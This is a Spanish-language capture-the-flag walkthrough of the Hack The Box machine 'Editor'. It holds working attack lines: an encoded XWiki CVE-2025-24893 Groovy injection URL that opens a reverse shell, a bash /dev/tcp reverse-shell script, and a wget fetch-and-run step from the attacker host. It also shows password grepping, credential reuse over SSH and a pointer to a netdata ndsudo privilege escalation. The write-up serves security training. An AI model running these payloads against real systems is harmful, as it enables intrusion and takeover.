Editor

#easy #linux

https://app.hackthebox.com/machines/Editor

Enumeración

sudo nmap -p- -sS -T 5 -n -Pn -vv 10.10.11.80 -oA allPorts

PORT      STATE    SERVICE       REASON
22/tcp    open     ssh           syn-ack ttl 63
80/tcp    open     http          syn-ack ttl 63
715/tcp   filtered iris-lwz      no-response
1859/tcp  filtered gammafetchsvr no-response
1907/tcp  filtered intrastar     no-response
3004/tcp  filtered csoftragent   no-response
3319/tcp  filtered sdt-lmd       no-response
3500/tcp  filtered rtmp-port     no-response
3597/tcp  filtered a14           no-response
3737/tcp  filtered xpanel        no-response
6511/tcp  filtered dccp-udp      no-response
6984/tcp  filtered unknown       no-response
7271/tcp  filtered unknown       no-response
8080/tcp  open     http-proxy    syn-ack ttl 63
8099/tcp  filtered unknown       no-response
9211/tcp  filtered oma-mlp-s     no-response
9698/tcp  filtered unknown       no-response
11395/tcp filtered unknown       no-response
13909/tcp filtered unknown       no-response
14178/tcp filtered unknown       no-response
15763/tcp filtered unknown       no-response
17003/tcp filtered unknown       no-response
22796/tcp filtered unknown       no-response
25709/tcp filtered unknown       no-response
25883/tcp filtered unknown       no-response
26943/tcp filtered unknown       no-response
27655/tcp filtered unknown       no-response
29668/tcp filtered unknown       no-response
29814/tcp filtered unknown       no-response
30483/tcp filtered unknown       no-response
30931/tcp filtered unknown       no-response
34233/tcp filtered unknown       no-response
34581/tcp filtered unknown       no-response
34940/tcp filtered unknown       no-response
36650/tcp filtered unknown       no-response
38186/tcp filtered unknown       no-response
39105/tcp filtered unknown       no-response
40318/tcp filtered unknown       no-response
40828/tcp filtered unknown       no-response
41754/tcp filtered unknown       no-response
42460/tcp filtered unknown       no-response
42770/tcp filtered unknown       no-response
43012/tcp filtered unknown       no-response
44469/tcp filtered unknown       no-response
44589/tcp filtered unknown       no-response
45635/tcp filtered unknown       no-response
45989/tcp filtered unknown       no-response
47007/tcp filtered unknown       no-response
47544/tcp filtered unknown       no-response
48580/tcp filtered unknown       no-response
48698/tcp filtered unknown       no-response
55011/tcp filtered unknown       no-response
55557/tcp filtered unknown       no-response
55869/tcp filtered unknown       no-response
58945/tcp filtered unknown       no-response
59493/tcp filtered unknown       no-response
59717/tcp filtered unknown       no-response
59921/tcp filtered unknown       no-response
60683/tcp filtered unknown       no-response
61263/tcp filtered unknown       no-response
62534/tcp filtered unknown       no-response
62821/tcp filtered unknown       no-response
64324/tcp filtered unknown       no-response

nmap -p 22,80,8080 -sCV -Pn -n -vv 10.10.11.80 -oA openPorts

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp   open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
8080/tcp open  http    syn-ack ttl 63 Jetty 10.0.20
|_http-server-header: Jetty(10.0.20)
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD PROPFIND LOCK UNLOCK
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 50 disallowed entries (40 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
| /xwiki/bin/undelete/ /xwiki/bin/reset/ /xwiki/bin/register/ 
| /xwiki/bin/propupdate/ /xwiki/bin/propadd/ /xwiki/bin/propdisable/ 
| /xwiki/bin/propenable/ /xwiki/bin/propdelete/ /xwiki/bin/objectadd/ 
| /xwiki/bin/commentadd/ /xwiki/bin/commentsave/ /xwiki/bin/objectsync/ 
| /xwiki/bin/objectremove/ /xwiki/bin/attach/ /xwiki/bin/upload/ 
| /xwiki/bin/temp/ /xwiki/bin/downloadrev/ /xwiki/bin/dot/ 
| /xwiki/bin/delattachment/ /xwiki/bin/skin/ /xwiki/bin/jsx/ /xwiki/bin/ssx/ 
| /xwiki/bin/login/ /xwiki/bin/loginsubmit/ /xwiki/bin/loginerror/ 
|_/xwiki/bin/logout/
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|   Server Type: Jetty(10.0.20)
|_  WebDAV type: Unknown
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

echo '10.10.11.80 editor.htb' | sudo tee -a /etc/hosts

http://editor.htb/

XWiki Debian 15.10.8

ffuf -u http://editor.htb -H 'HOST: FUZZ.editor.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -c -ic -t 80 -fs 154

wiki                    [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 173ms]

Googlear XWiki Debian 15.10.8 vuln

https://nvd-nist-gov.translate.goog/vuln/detail/CVE-2025-24893?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=es&_x_tr_pto=tc

Googlear CVE-2025-24893 poc

https://github.com/topics/cve-2025-24893

https://github.com/D3Ext/CVE-2025-24893

wiki.editor.htb/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.185%2F1111%200%3E%261%22%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

Crear una shell

#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.185/1111 0>&1"

Levantar un servidor con Python para compartir el archivo con la shell

python3 -m http.server

Ponerse en escucha en la máquina atacante

nc -lnvp 1111

Ejecutar el POC

python3 poc.py --url "http://wiki.editor.htb/xwiki" --command "wget http://10.10.14.185:8000/shell.sh -qO /tmp/shell.sh"
python3 poc.py --url "http://wiki.editor.htb/xwiki" --command "bash /tmp/shell.sh"

Shell interactiva estable

xwiki@editor:/usr/lib/xwiki$ grep -rin --color=auto "password" WEB-INF/

./hibernate.cfg.xml:104:    <property name="hibernate.connection.password">theEd1t0rTeam99</property>

xwiki@editor:/usr/lib/xwiki$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash

User: oliver
Password: theEd1t0rTeam99

ssh oliver@editor.htb

User flag

oliver@editor:~$ cat user.txt

23b4************************2f70

find / -type f -perm -4000 -user root 2>/dev/null

/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

Googlear netdata ndsudo exploit site:github.com

https://github.com/dollarboysushil/CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation

Root flag

root@editor:/root# cat root.txt

2274************************59cb